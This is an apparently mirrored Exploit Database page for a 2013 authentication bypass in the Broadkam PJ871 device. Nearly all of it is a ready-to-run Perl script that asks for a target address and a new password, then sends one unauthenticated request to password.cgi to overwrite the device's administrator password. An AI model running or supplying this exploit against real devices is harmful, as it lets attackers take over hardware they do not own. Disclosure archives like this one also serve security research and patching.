Broadkam PJ871 – Authentication Bypass

• Exploit Database
• 118 阅读

• 作者： d3c0der
  日期： 2013-07-27
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/27134/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

  #!/usr/bin/perl #d3c0der     use HTTP::Request; use LWP::UserAgent;     print "= Target : "; $ip=<STDIN>; chomp $ip; print "= new password : "; $npass=<STDIN>; chomp $npass;   if ( $ip !~ /^http:/ ) { $ip = &apos;http://&apos; . $ip; } if ( $ip !~ /\/$/ ) { $ip = $ip . &apos;/&apos;; } print "\n";   print "->attacking , plz wait ! : $ip\n";     @path1=("password.cgi?sysPassword=$npass");   foreach $ways(@path1){   $final=$ip.$ways;   my $req=HTTP::Request->new(GET=>$final); my $ua=LWP::UserAgent->new(); $ua->timeout(30); my $response=$ua->request($req);   } print "[-] password changed to $npass \n";